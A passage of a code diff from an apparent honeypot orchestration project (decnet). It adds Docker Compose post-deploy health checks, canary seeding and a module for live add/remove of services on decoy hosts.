container: str,
|
||||||
|
path: str,
|
||||||
|
*,
|
||||||
|
timeout: float = _DEFAULT_TIMEOUT,
|
||||||
|
) -> tuple[bool, Optional[str]]:
|
||||||
|
"""Best-effort ``rm -f`` of *path* inside *container*.
|
||||||
|
|
||||||
|
Returns ``(success, error_or_none)``. ``rm -f`` returns rc=0 even
|
||||||
|
when the file is already gone, so a True result here means "the
|
||||||
|
file is not present after this call", regardless of who unlinked it.
|
||||||
|
"""
|
||||||
|
sh_cmd = f"rm -f {shlex.quote(path)}"
|
||||||
|
argv = [_DOCKER, "exec", container, "sh", "-c", sh_cmd]
|
||||||
|
rc, _stdout, stderr = await _run(argv, timeout=timeout)
|
||||||
|
if rc == 0:
|
||||||
|
return True, None
|
||||||
|
return False, stderr.strip()[:256] or f"rc={rc}"
|
||||||
@@ -3,6 +3,7 @@ Deploy, teardown, and status via Docker SDK + subprocess docker compose.
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
import asyncio
|
import asyncio
|
||||||
|
import json
|
||||||
import shutil
|
import shutil
|
||||||
import subprocess # nosec B404
|
import subprocess # nosec B404
|
||||||
import time
|
import time
|
||||||
@@ -163,6 +164,48 @@ def _sync_sessrec_sources(config: DecnetConfig) -> None:
|
|||||||
shutil.copy2(src, dest)
|
shutil.copy2(src, dest)
|
||||||
|
|
||||||
|
|
||||||
|
def _compose_ps(compose_file: Path) -> list[dict[str, object]]:
|
||||||
|
"""Return ``docker compose ps`` rows for *compose_file* as parsed JSON.
|
||||||
|
|
||||||
|
Used for post-deploy verification: ``compose up -d`` returns 0 the
|
||||||
|
moment containers are *started*, but a service that crashes on boot
|
||||||
|
(port collision, bad image, missing dependency) only shows up here.
|
||||||
|
Returns an empty list when compose has nothing to report (and on
|
||||||
|
parse failure — caller treats that as 'unverifiable, don't gate').
|
||||||
|
"""
|
||||||
|
cmd = [
|
||||||
|
"docker", "compose", "-p", "decnet", "-f", str(compose_file),
|
||||||
|
"ps", "--all", "--format", "json",
|
||||||
|
]
|
||||||
|
try:
|
||||||
|
result = subprocess.run( # nosec B603
|
||||||
|
cmd, capture_output=True, text=True, check=False,
|
||||||
|
)
|
||||||
|
except FileNotFoundError:
|
||||||
|
return []
|
||||||
|
if result.returncode != 0:
|
||||||
|
return []
|
||||||
|
rows: list[dict[str, object]] = []
|
||||||
|
# ``docker compose ps --format json`` emits one JSON object per line
|
||||||
|
# (newline-delimited), not a JSON array. Parse line-by-line so a
|
||||||
|
# single bad line doesn't poison the whole result.
|
||||||
|
for line in (result.stdout or "").splitlines():
|
||||||
|
line = line.strip()
|
||||||
|
if not line:
|
||||||
|
continue
|
||||||
|
try:
|
||||||
|
obj = json.loads(line)
|
||||||
|
except json.JSONDecodeError:
|
||||||
|
continue
|
||||||
|
if isinstance(obj, dict):
|
||||||
|
rows.append(obj)
|
||||||
|
elif isinstance(obj, list):
|
||||||
|
for item in obj:
|
||||||
|
if isinstance(item, dict):
|
||||||
|
rows.append(item)
|
||||||
|
return rows
|
||||||
|
|
||||||
|
|
||||||
def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
|
def _compose(*args: str, compose_file: Path = COMPOSE_FILE, env: dict | None = None) -> None:
|
||||||
import os
|
import os
|
||||||
# -p decnet pins the compose project name. Without it, docker compose
|
# -p decnet pins the compose project name. Without it, docker compose
|
||||||
@@ -953,8 +996,84 @@ async def deploy_topology(repo, topology_id: str, *, dry_run: bool = False) -> N
|
|||||||
)
|
)
|
||||||
raise
|
raise
|
||||||
|
|
||||||
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
|
# Post-deploy verification: ``compose up -d`` returns 0 the moment
|
||||||
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
|
# containers are *started*, so a service that crashes on boot
|
||||||
|
# (port bind failure, bad image, missing dependency) leaves the
|
||||||
|
# topology row sitting at ACTIVE while half the substrate is dead.
|
||||||
|
# Sample compose ps once and downgrade to DEGRADED if any expected
|
||||||
|
# container isn't running — operators see real state instead of an
|
||||||
|
# optimistic flag.
|
||||||
|
ps_rows = await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose_ps(compose_path),
|
||||||
|
)
|
||||||
|
bad: list[str] = []
|
||||||
|
# Build the per-decky state map. The base container's compose
|
||||||
|
# service name == decky name, which is what we cache on the
|
||||||
|
# TopologyDecky row. Service containers (named ``<decky>-<svc>``)
|
||||||
|
# don't gate the decky's state — service-level failures are visible
|
||||||
|
# in compose ps separately and don't downgrade the decky as a whole.
|
||||||
|
decky_state_by_name: dict[str, str] = {}
|
||||||
|
for row in ps_rows:
|
||||||
|
state = str(row.get("State", "")).lower()
|
||||||
|
service_name = str(row.get("Service") or "")
|
||||||
|
if service_name and "-" not in service_name:
|
||||||
|
# Plain decky base; cache its docker state.
|
||||||
|
decky_state_by_name[service_name] = state or "unknown"
|
||||||
|
if state and state != "running":
|
||||||
|
name = str(row.get("Name") or row.get("Service") or "?")
|
||||||
|
exit_code = row.get("ExitCode")
|
||||||
|
bad.append(
|
||||||
|
f"{name}={state}"
|
||||||
|
+ (f" (exit={exit_code})" if exit_code not in (None, 0, "") else "")
|
||||||
|
)
|
||||||
|
|
||||||
|
# Reconcile each TopologyDecky.state from compose's view. Without
|
||||||
|
# this, the row stays at the default 'pending' forever and the
|
||||||
|
# dashboard's ACTIVE DECKIES count reads 0/N even when everything's
|
||||||
|
# actually up.
|
||||||
|
for decky in hydrated["deckies"]:
|
||||||
|
cfg = decky.get("decky_config") or {}
|
||||||
|
decky_name = cfg.get("name") or decky.get("name")
|
||||||
|
if not decky_name:
|
||||||
|
continue
|
||||||
|
ds = decky_state_by_name.get(decky_name, "unknown")
|
||||||
|
new_state = "running" if ds == "running" else "failed"
|
||||||
|
try:
|
||||||
|
await repo.update_topology_decky(
|
||||||
|
decky["uuid"], {"state": new_state},
|
||||||
|
)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
log.warning(
|
||||||
|
"post-deploy state reconcile failed topology=%s decky=%s: %s",
|
||||||
|
topology_id, decky_name, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
if bad:
|
||||||
|
reason = "post-deploy check: " + ", ".join(bad[:8]) + (
|
||||||
|
f" and {len(bad) - 8} more" if len(bad) > 8 else ""
|
||||||
|
)
|
||||||
|
await transition_status(
|
||||||
|
repo, topology_id, TopologyStatus.DEGRADED, reason=reason,
|
||||||
|
)
|
||||||
|
log.warning(
|
||||||
|
"topology %s deployed but %d container(s) unhealthy: %s",
|
||||||
|
topology_id, len(bad), reason,
|
||||||
|
)
|
||||||
|
else:
|
||||||
|
await transition_status(repo, topology_id, TopologyStatus.ACTIVE)
|
||||||
|
log.info("topology %s deployed n_lans=%d", topology_id, len(lans))
|
||||||
|
|
||||||
|
# Best-effort canary baseline seed across every decky in the
|
||||||
|
# topology. Same resilience contract as the fleet path: failures
|
||||||
|
# surface as state=failed token rows, never abort the deploy.
|
||||||
|
try:
|
||||||
|
from decnet.canary import planter as _canary_planter
|
||||||
|
await _canary_planter.seed_baseline_topology(repo, topology_id)
|
||||||
|
except Exception as exc: # noqa: BLE001
|
||||||
|
log.warning(
|
||||||
|
"canary baseline seed failed (best-effort) topology=%s err=%s",
|
||||||
|
topology_id, exc,
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
@_traced("engine.teardown_topology")
|
@_traced("engine.teardown_topology")
|
||||||
|
|||||||
673
decnet/engine/services_live.py
Normal file
673
decnet/engine/services_live.py
Normal file
@@ -0,0 +1,673 @@
|
|||||||
|
"""Add/remove a single service on a deployed decky without full redeploy.
|
||||||
|
|
||||||
|
The ``_compose()`` wrapper in :mod:`decnet.engine.deployer` already
|
||||||
|
supports per-service targeting (``up --no-deps -d <svc>``,
|
||||||
|
``stop <svc>``, ``rm -f <svc>``). What was missing was the
|
||||||
|
orchestration: regenerate the compose file (so future redeploys reflect
|
||||||
|
the change), persist the new ``services`` list, and run the targeted
|
||||||
|
compose command.
|
||||||
|
|
||||||
|
Two scopes:
|
||||||
|
|
||||||
|
* **Topology** — source of truth is the ``topology_deckies`` table; the
|
||||||
|
compose file is per-topology (``decnet-topology-<id8>-compose.yml``).
|
||||||
|
* **Fleet** — source of truth is ``decnet-state.json`` (with the
|
||||||
|
``fleet_deckies`` table mirroring it); compose is the unihost
|
||||||
|
``decnet-compose.yml``.
|
||||||
|
|
||||||
|
Both publish ``decky.<name>.service.added`` /
|
||||||
|
``decky.<name>.service.removed`` on the bus. The new topic constants
|
||||||
|
are documented in ``wiki-checkout/Service-Bus.md``.
|
||||||
|
"""
|
||||||
|
from __future__ import annotations
|
||||||
|
|
||||||
|
import subprocess # nosec B404
|
||||||
|
from pathlib import Path
|
||||||
|
from typing import Any, Literal, Optional
|
||||||
|
|
||||||
|
import anyio
|
||||||
|
|
||||||
|
from decnet.bus import topics
|
||||||
|
from decnet.logging import get_logger
|
||||||
|
from decnet.services.base import BaseService
|
||||||
|
from decnet.services.registry import get_service
|
||||||
|
from decnet.topology.persistence import hydrate
|
||||||
|
from decnet.web.db.repository import BaseRepository
|
||||||
|
|
||||||
|
# Heavy imports (composer/deployer pull in decnet.network → docker) are
|
||||||
|
# deferred to call-sites via the ``_compose`` / ``_topology_compose_path``
|
||||||
|
# / ``_load_state`` indirection helpers below. Mirrors the lazy-import
|
||||||
|
# pattern in decnet.canary.planter for the same reason.
|
||||||
|
|
||||||
|
|
||||||
|
def _compose(*args: str, compose_file: Optional[Path] = None, env=None) -> None:
|
||||||
|
"""Indirection so tests can ``monkeypatch.setattr(services_live, '_compose', ...)``.
|
||||||
|
|
||||||
|
Real implementation lives in :mod:`decnet.engine.deployer`; we
|
||||||
|
import-and-delegate at call time to keep this module's import graph
|
||||||
|
clean (see module docstring above).
|
||||||
|
"""
|
||||||
|
from decnet.engine.deployer import _compose as _real_compose
|
||||||
|
if compose_file is None:
|
||||||
|
_real_compose(*args, env=env)
|
||||||
|
else:
|
||||||
|
_real_compose(*args, compose_file=compose_file, env=env)
|
||||||
|
|
||||||
|
|
||||||
|
def _topology_compose_path(topology_id: str) -> Path:
|
||||||
|
from decnet.engine.deployer import _topology_compose_path as _real_path
|
||||||
|
return _real_path(topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
def _write_topology_compose(hydrated, path: Path) -> Path:
|
||||||
|
from decnet.topology.compose import write_topology_compose
|
||||||
|
return write_topology_compose(hydrated, path)
|
||||||
|
|
||||||
|
|
||||||
|
def _load_state():
|
||||||
|
from decnet.config import load_state as _real_load_state
|
||||||
|
return _real_load_state()
|
||||||
|
|
||||||
|
|
||||||
|
def _save_state(config, compose_path) -> None:
|
||||||
|
from decnet.config import save_state as _real_save_state
|
||||||
|
_real_save_state(config, compose_path)
|
||||||
|
|
||||||
|
|
||||||
|
def _write_compose(config, compose_path) -> None:
|
||||||
|
from decnet.composer import write_compose as _real_write_compose
|
||||||
|
_real_write_compose(config, compose_path)
|
||||||
|
|
||||||
|
|
||||||
|
def _get_bus():
|
||||||
|
from decnet.bus.factory import get_bus
|
||||||
|
return get_bus()
|
||||||
|
|
||||||
|
|
||||||
|
# --------------------------- swarm propagation helpers ---------------------------
|
||||||
|
#
|
||||||
|
# Service mutations (add/remove/update_config) on a deployed decky used to run
|
||||||
|
# the master's local docker-compose only. For swarm fleet deckies the master
|
||||||
|
# has no containers; for agent-targeted topologies the master only writes a
|
||||||
|
# compose file the worker never sees. These helpers replay the change to the
|
||||||
|
# worker so the env actually lands.
|
||||||
|
#
|
||||||
|
# Lazy imports keep this module's import graph clean (composer/swarm pull in
|
||||||
|
# decnet.network → docker, mirroring the pattern used elsewhere in this file).
|
||||||
|
|
||||||
|
|
||||||
|
async def _fleet_decky_host_uuid(repo: BaseRepository, decky_name: str) -> Optional[str]:
|
||||||
|
"""Return ``host_uuid`` if a fleet decky lives on a swarm worker, else None."""
|
||||||
|
shards = await repo.list_decky_shards()
|
||||||
|
for s in shards:
|
||||||
|
if s.get("decky_name") == decky_name:
|
||||||
|
return s.get("host_uuid")
|
||||||
|
return None
|
||||||
|
|
||||||
|
|
||||||
|
async def _redispatch_fleet_shard(repo: BaseRepository, host_uuid: str) -> None:
|
||||||
|
"""Re-push the host's full shard to its worker agent.
|
||||||
|
|
||||||
|
Uses the same code path as POST /swarm/deploy: load master state, filter
|
||||||
|
to the host's deckies, hand to AgentClient.deploy via dispatch_decnet_config.
|
||||||
|
The agent regenerates compose and recreates only the changed containers.
|
||||||
|
Idempotent for unchanged deckies.
|
||||||
|
"""
|
||||||
|
from decnet.web.router.swarm.api_deploy_swarm import dispatch_decnet_config
|
||||||
|
|
||||||
|
state = _load_state()
|
||||||
|
if state is None:
|
||||||
|
log.warning("redispatch_fleet_shard: no fleet state on master; skipping")
|
||||||
|
return
|
||||||
|
config, _compose_path = state
|
||||||
|
host_deckies = [d for d in config.deckies if getattr(d, "host_uuid", None) == host_uuid]
|
||||||
|
if not host_deckies:
|
||||||
|
log.warning(
|
||||||
|
"redispatch_fleet_shard: master state has no deckies for host=%s; skipping",
|
||||||
|
host_uuid,
|
||||||
|
)
|
||||||
|
return
|
||||||
|
filtered = config.model_copy(update={"deckies": host_deckies})
|
||||||
|
await dispatch_decnet_config(filtered, repo)
|
||||||
|
|
||||||
|
|
||||||
|
async def _resync_agent_topology(repo: BaseRepository, topology_id: str) -> None:
|
||||||
|
"""If the topology is agent-pinned, push the latest hydrated blob to the worker."""
|
||||||
|
from decnet.engine.deployer import resync_agent_topology
|
||||||
|
|
||||||
|
hydrated = await hydrate(repo, topology_id)
|
||||||
|
if hydrated is None:
|
||||||
|
return
|
||||||
|
if not hydrated.get("topology", {}).get("target_host_uuid"):
|
||||||
|
return # unihost topology — local compose is authoritative
|
||||||
|
await resync_agent_topology(repo, topology_id)
|
||||||
|
|
||||||
|
|
||||||
|
log = get_logger("engine.services_live")
|
||||||
|
|
||||||
|
DeckyKind = Literal["fleet", "topology"]
|
||||||
|
|
||||||
|
|
||||||
|
class ServiceMutationError(ValueError):
|
||||||
|
"""Raised for caller-correctable failures. The API layer dispatches on
|
||||||
|
subclass to produce 4xx codes; base class maps to 422.
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
class ServiceNotFoundError(ServiceMutationError):
|
||||||
|
"""Decky or topology does not exist → 404."""
|
||||||
|
|
||||||
|
|
||||||
|
class ServiceConflictError(ServiceMutationError):
|
||||||
|
"""Idempotency violation (already on / not on) → 409."""
|
||||||
|
|
||||||
|
|
||||||
|
def _validate_service_for_per_decky(name: str) -> BaseService:
|
||||||
|
"""Return the registered service or raise ``ServiceMutationError``.
|
||||||
|
|
||||||
|
``fleet_singleton`` services run once per fleet (e.g. an LLMNR
|
||||||
|
responder), not per-decky — we reject the per-decky add/remove
|
||||||
|
request rather than silently producing a no-op compose entry.
|
||||||
|
"""
|
||||||
|
try:
|
||||||
|
svc = get_service(name)
|
||||||
|
except KeyError as exc:
|
||||||
|
raise ServiceMutationError(f"unknown service {name!r}") from exc
|
||||||
|
if svc.fleet_singleton:
|
||||||
|
raise ServiceMutationError(
|
||||||
|
f"service {name!r} is fleet_singleton; not addable per-decky"
|
||||||
|
)
|
||||||
|
return svc
|
||||||
|
|
||||||
|
|
||||||
|
async def _publish(topic: str, payload: dict[str, Any]) -> None:
|
||||||
|
"""Best-effort bus publish — same shape as the canary planter's helper."""
|
||||||
|
try:
|
||||||
|
bus = _get_bus()
|
||||||
|
await bus.connect()
|
||||||
|
await bus.publish(topic, payload)
|
||||||
|
await bus.close()
|
||||||
|
except Exception as e: # noqa: BLE001
|
||||||
|
log.warning("services_live bus publish failed topic=%s err=%s", topic, e)
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------- topology path
|
||||||
|
|
||||||
|
|
||||||
|
async def _topology_decky(
|
||||||
|
repo: BaseRepository, topology_id: str, decky_name: str,
|
||||||
|
) -> dict[str, Any]:
|
||||||
|
hydrated = await hydrate(repo, topology_id)
|
||||||
|
if hydrated is None:
|
||||||
|
raise ServiceNotFoundError(f"topology {topology_id!r} not found")
|
||||||
|
for d in hydrated["deckies"]:
|
||||||
|
cfg = d.get("decky_config") or {}
|
||||||
|
name = cfg.get("name") or d.get("name")
|
||||||
|
if name == decky_name:
|
||||||
|
return d
|
||||||
|
raise ServiceNotFoundError(
|
||||||
|
f"decky {decky_name!r} is not in topology {topology_id!r}"
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
async def _rerender_topology_compose(
|
||||||
|
repo: BaseRepository, topology_id: str,
|
||||||
|
) -> Path:
|
||||||
|
"""Re-hydrate + re-render the per-topology compose file.
|
||||||
|
|
||||||
|
Called after a successful DB update so future deploys reflect the
|
||||||
|
change; without this the file would still describe the old service
|
||||||
|
set and a subsequent ``up -d`` would resurrect the removed service.
|
||||||
|
"""
|
||||||
|
hydrated = await hydrate(repo, topology_id)
|
||||||
|
if hydrated is None: # pragma: no cover — narrow race
|
||||||
|
raise ServiceNotFoundError(
|
||||||
|
f"topology {topology_id!r} disappeared mid-mutation"
|
||||||
|
)
|
||||||
|
path = _topology_compose_path(topology_id)
|
||||||
|
_write_topology_compose(hydrated, path)
|
||||||
|
return path
|
||||||
|
|
||||||
|
|
||||||
|
async def _add_topology_service(
|
||||||
|
repo: BaseRepository,
|
||||||
|
topology_id: str,
|
||||||
|
decky_name: str,
|
||||||
|
service_name: str,
|
||||||
|
initial_config: dict | None = None,
|
||||||
|
) -> list[str]:
|
||||||
|
decky = await _topology_decky(repo, topology_id, decky_name)
|
||||||
|
services: list[str] = list(decky.get("services") or [])
|
||||||
|
if service_name in services:
|
||||||
|
raise ServiceConflictError(
|
||||||
|
f"service {service_name!r} already on decky {decky_name!r}"
|
||||||
|
)
|
||||||
|
services.append(service_name)
|
||||||
|
update: dict[str, Any] = {"services": services}
|
||||||
|
# If the caller supplied initial config, fold it into decky_config
|
||||||
|
# BEFORE compose regen so the first ``up`` materialises the env on
|
||||||
|
# the new container — no follow-up apply needed.
|
||||||
|
if initial_config:
|
||||||
|
cfg_blob = dict(decky.get("decky_config") or {})
|
||||||
|
sc = dict(cfg_blob.get("service_config") or {})
|
||||||
|
sc[service_name] = initial_config
|
||||||
|
cfg_blob["service_config"] = sc
|
||||||
|
update["decky_config"] = cfg_blob
|
||||||
|
await repo.update_topology_decky(decky["uuid"], update)
|
||||||
|
|
||||||
|
compose_path = await _rerender_topology_compose(repo, topology_id)
|
||||||
|
if await _topology_is_agent_pinned(repo, topology_id):
|
||||||
|
# Agent-pinned: the master's local compose has nothing to up.
|
||||||
|
# Push the new hydrated blob to the worker.
|
||||||
|
await _resync_agent_topology(repo, topology_id)
|
||||||
|
else:
|
||||||
|
target = f"{decky_name}-{service_name}"
|
||||||
|
# Run compose in a worker thread so the API event loop stays
|
||||||
|
# responsive — same pattern as engine/deployer.deploy_topology.
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose(
|
||||||
|
"up", "-d", "--no-deps", "--build", target,
|
||||||
|
compose_file=compose_path,
|
||||||
|
),
|
||||||
|
)
|
||||||
|
return services
|
||||||
|
|
||||||
|
|
||||||
|
async def _topology_is_agent_pinned(repo: BaseRepository, topology_id: str) -> bool:
|
||||||
|
hydrated = await hydrate(repo, topology_id)
|
||||||
|
if hydrated is None:
|
||||||
|
return False
|
||||||
|
return bool(hydrated.get("topology", {}).get("target_host_uuid"))
|
||||||
|
|
||||||
|
|
||||||
|
async def _remove_topology_service(
|
||||||
|
repo: BaseRepository,
|
||||||
|
topology_id: str,
|
||||||
|
decky_name: str,
|
||||||
|
service_name: str,
|
||||||
|
) -> list[str]:
|
||||||
|
decky = await _topology_decky(repo, topology_id, decky_name)
|
||||||
|
services: list[str] = list(decky.get("services") or [])
|
||||||
|
if service_name not in services:
|
||||||
|
raise ServiceConflictError(
|
||||||
|
f"service {service_name!r} not on decky {decky_name!r}"
|
||||||
|
)
|
||||||
|
services = [s for s in services if s != service_name]
|
||||||
|
target = f"{decky_name}-{service_name}"
|
||||||
|
compose_path = _topology_compose_path(topology_id)
|
||||||
|
agent_pinned = await _topology_is_agent_pinned(repo, topology_id)
|
||||||
|
if not agent_pinned:
|
||||||
|
# Stop + rm before persisting + re-rendering so a half-completed
|
||||||
|
# mutation leaves the operator a clear state to retry from
|
||||||
|
# (container still running; DB still says service is on).
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose("stop", target, compose_file=compose_path),
|
||||||
|
)
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose("rm", "-f", target, compose_file=compose_path),
|
||||||
|
)
|
||||||
|
await repo.update_topology_decky(decky["uuid"], {"services": services})
|
||||||
|
await _rerender_topology_compose(repo, topology_id)
|
||||||
|
if agent_pinned:
|
||||||
|
# Worker tears down the removed service when it diffs the
|
||||||
|
# incoming hydrated blob against its current state.
|
||||||
|
await _resync_agent_topology(repo, topology_id)
|
||||||
|
return services
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------- fleet path
|
||||||
|
|
||||||
|
|
||||||
|
def _fleet_state_or_raise() -> tuple[Any, Path]:
|
||||||
|
state = _load_state()
|
||||||
|
if state is None:
|
||||||
|
raise ServiceMutationError(
|
||||||
|
"no fleet state on disk — run `decnet up` first"
|
||||||
|
)
|
||||||
|
return state
|
||||||
|
|
||||||
|
|
||||||
|
def _fleet_find_decky(config: Any, decky_name: str) -> Any:
|
||||||
|
for d in config.deckies:
|
||||||
|
if d.name == decky_name:
|
||||||
|
return d
|
||||||
|
raise ServiceNotFoundError(f"fleet decky {decky_name!r} not found")
|
||||||
|
|
||||||
|
|
||||||
|
async def _persist_fleet_change(
|
||||||
|
repo: BaseRepository, decky: Any, services: list[str], compose_path: Path,
|
||||||
|
) -> None:
|
||||||
|
"""Persist the mutation to JSON state, compose file, and the DB row."""
|
||||||
|
config, _ = _load_state()
|
||||||
|
target = _fleet_find_decky(config, decky.name)
|
||||||
|
target.services = services
|
||||||
|
_save_state(config, compose_path)
|
||||||
|
_write_compose(config, compose_path)
|
||||||
|
# Mirror to the DB row so DB-only consumers (dashboard, API) see the
|
||||||
|
# change without waiting for the reconciler.
|
||||||
|
from decnet.web.db.models import LOCAL_HOST_SENTINEL
|
||||||
|
await repo.upsert_fleet_decky({
|
||||||
|
"host_uuid": getattr(decky, "host_uuid", None) or LOCAL_HOST_SENTINEL,
|
||||||
|
"name": decky.name,
|
||||||
|
"services": services,
|
||||||
|
"decky_config": target.model_dump(mode="json"),
|
||||||
|
"decky_ip": decky.ip,
|
||||||
|
"state": "running",
|
||||||
|
})
|
||||||
|
|
||||||
|
|
||||||
|
async def _add_fleet_service(
|
||||||
|
repo: BaseRepository,
|
||||||
|
decky_name: str,
|
||||||
|
service_name: str,
|
||||||
|
initial_config: dict | None = None,
|
||||||
|
) -> list[str]:
|
||||||
|
config, compose_path = _fleet_state_or_raise()
|
||||||
|
decky = _fleet_find_decky(config, decky_name)
|
||||||
|
services: list[str] = list(decky.services or [])
|
||||||
|
if service_name in services:
|
||||||
|
raise ServiceConflictError(
|
||||||
|
f"service {service_name!r} already on decky {decky_name!r}"
|
||||||
|
)
|
||||||
|
services.append(service_name)
|
||||||
|
if initial_config:
|
||||||
|
# Same path as _update_fleet_service_config: stash the validated
|
||||||
|
# cfg on the decky model so the compose write picks it up.
|
||||||
|
sc = dict(getattr(decky, "service_config", None) or {})
|
||||||
|
sc[service_name] = initial_config
|
||||||
|
decky.service_config = sc
|
||||||
|
await _persist_fleet_change(repo, decky, services, compose_path)
|
||||||
|
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
|
||||||
|
if swarm_host_uuid:
|
||||||
|
# Master has no container for this decky — re-push the host's
|
||||||
|
# shard so the worker materialises the new service.
|
||||||
|
await _redispatch_fleet_shard(repo, swarm_host_uuid)
|
||||||
|
else:
|
||||||
|
target = f"{decky_name}-{service_name}"
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose(
|
||||||
|
"up", "-d", "--no-deps", "--build", target,
|
||||||
|
compose_file=compose_path,
|
||||||
|
),
|
||||||
|
)
|
||||||
|
return services
|
||||||
|
|
||||||
|
|
||||||
|
async def _remove_fleet_service(
|
||||||
|
repo: BaseRepository, decky_name: str, service_name: str,
|
||||||
|
) -> list[str]:
|
||||||
|
config, compose_path = _fleet_state_or_raise()
|
||||||
|
decky = _fleet_find_decky(config, decky_name)
|
||||||
|
services: list[str] = list(decky.services or [])
|
||||||
|
if service_name not in services:
|
||||||
|
raise ServiceConflictError(
|
||||||
|
f"service {service_name!r} not on decky {decky_name!r}"
|
||||||
|
)
|
||||||
|
services = [s for s in services if s != service_name]
|
||||||
|
target = f"{decky_name}-{service_name}"
|
||||||
|
swarm_host_uuid = await _fleet_decky_host_uuid(repo, decky_name)
|
||||||
|
if not swarm_host_uuid:
|
||||||
|
# Local: stop+rm before persist so the operator has a clear retry
|
||||||
|
# state if compose fails halfway. Swarm: skip — the worker's compose
|
||||||
|
# will handle the removal when the redispatched config drops the
|
||||||
|
# service from the decky.
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose("stop", target, compose_file=compose_path),
|
||||||
|
)
|
||||||
|
await anyio.to_thread.run_sync(
|
||||||
|
lambda: _compose("rm", "-f", target, compose_file=compose_path),
|
||||||
|
)
|
||||||
|
await _persist_fleet_change(repo, decky, services, compose_path)
|
||||||
|
if swarm_host_uuid:
|
||||||
|
await _redispatch_fleet_shard(repo, swarm_host_uuid)
|
||||||
|
return services
|
||||||
|
|
||||||
|
|
||||||
|
# ---------------------------------------------------------- public api
|
||||||
|
|
||||||
|
|
||||||
|
async def add_service(
|
||||||
|
repo: BaseRepository,
|
||||||
|
*,
|
||||||
|
decky_kind: DeckyKind,
|
||||||
|
decky_name: str,
|
||||||
|
service_name: str,
|
||||||
|
topology_id: Optional[str] = None,
|
||||||
|
config: dict | None = None,
|
||||||
|
) -> list[str]:
|
||||||
|
"""Add *service_name* to a deployed decky.
|
||||||
|
|
||||||
|
Validates the service registry (rejects unknown / fleet_singleton
|
||||||
|
names) and the optional ``config`` against the service's schema,
|
||||||
|
persists the change, regenerates the compose file, runs
|
||||||
|
``up -d --no-deps --build <decky>-<service>`` in a worker thread,
|
||||||
|
and publishes ``decky.<name>.service.added`` on the bus.
|
||||||
|
|
||||||
|
``config`` is the same dict shape PUT/POST .../config accepts; it's
|
||||||
|
coerced via ``BaseService.validate_cfg`` before any state write so
|
||||||
|
a 400-class failure leaves zero side-effects.
|
||||||
|
|
||||||
|
Returns the post-mutation services list.
|
||||||
|
"""
|
||||||
|
svc = _validate_service_for_per_decky(service_name)
|
||||||
|
initial_config = svc.validate_cfg(config) if config else {}
|
||||||
|
if decky_kind == "topology":
|
||||||
|
if not topology_id:
|
||||||
|
raise ServiceMutationError(
|
||||||
|
"decky_kind=topology requires topology_id",
|
||||||
|
)
|
||||||
|
services = await _add_topology_service(
|
||||||
|
repo, topology_id, decky_name, service_name,
|
||||||
|
initial_config=initial_config,
|
||||||
|
)
|
||||||
|
elif decky_kind == "fleet":
|
||||||
|
services = await _add_fleet_service(
|
||||||
|
repo, decky_name, service_name,
|
||||||
|
initial_config=initial_config,
|
||||||
|
)
|
||||||
|
else: # pragma: no cover — Literal narrows
|
||||||
|
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
|
||||||
|
|
||||||
|
await _publish(
|
||||||
|
topics.decky(decky_name, topics.DECKY_SERVICE_ADDED),
|
||||||
|
{
|
||||||
|
"decky_name": decky_name,
|
||||||
|
"service_name": service_name,
|
||||||
|
"topology_id": topology_id,
|
||||||
|
"services": services,
|
||||||
|
},
|
||||||
|
)
|
||||||
|
log.info(
|
||||||
|
"services_live.add decky=%s topology=%s service=%s",
|
||||||
|
decky_name, topology_id, service_name,
|
||||||
|
)
|
||||||
|
return services
|
||||||
|
|
||||||
|
|
||||||
|
async def update_service_config(
|
||||||
|
repo: BaseRepository,
|
||||||
|
*,
|
||||||
|
decky_kind: DeckyKind,
|
||||||
|
decky_name: str,
|
||||||
|
service_name: str,
|
||||||
|
cfg: dict,
|
||||||
|
apply: bool = False,
|
||||||
|
topology_id: Optional[str] = None,
|
||||||
|
) -> dict:
|
||||||
|
"""Persist ``cfg`` as the new ``service_config[service_name]`` for a decky.
|
||||||
|
|
||||||
|
The submitted dict is validated against the service's
|
||||||
|
``config_schema`` (unknown keys dropped, types coerced) BEFORE any
|
||||||
|
DB write, so a 400-class failure leaves zero side-effects.
|
||||||
|
|
||||||
|
``apply=False`` (Save): only the DB row + compose file are updated.
|
||||||
|
The running container keeps its old env.
|
||||||
|
``apply=True`` (Apply): same persistence, then a force-recreate of
|
||||||
|
``<decky>-<service>`` so the container picks
|
||||||
|
up the new env. Destructive: drops any
|
||||||
|
in-container session state on that service.
|
||||||
|
|
||||||
|
Returns the post-mutation validated cfg.
|
||||||
|
"""
|
||||||
|
svc = _validate_service_for_per_decky(service_name)
|
||||||
|
validated = svc.validate_cfg(cfg)
|
||||||
|
if decky_kind == "topology":
|
||||||
|
if not topology_id:
|
||||||
|
raise ServiceMutationError(
|
||||||
|
"decky_kind=topology requires topology_id",
|
||||||
|
)
|
||||||
|
await _update_topology_service_config(
|
||||||
|
repo, topology_id, decky_name, service_name, validated, apply=apply,
|
||||||
|
)
|
||||||
|
elif decky_kind == "fleet":
|
||||||
|
await _update_fleet_service_config(
|
||||||
|
repo, decky_name, service_name, validated, apply=apply,
|
||||||
|
)
|
||||||
|
else: # pragma: no cover
|
||||||
|
raise ServiceMutationError(f"unknown decky_kind {decky_kind!r}")
|
||||||
|
|
||||||
|
await _publish(
|
||||||
|
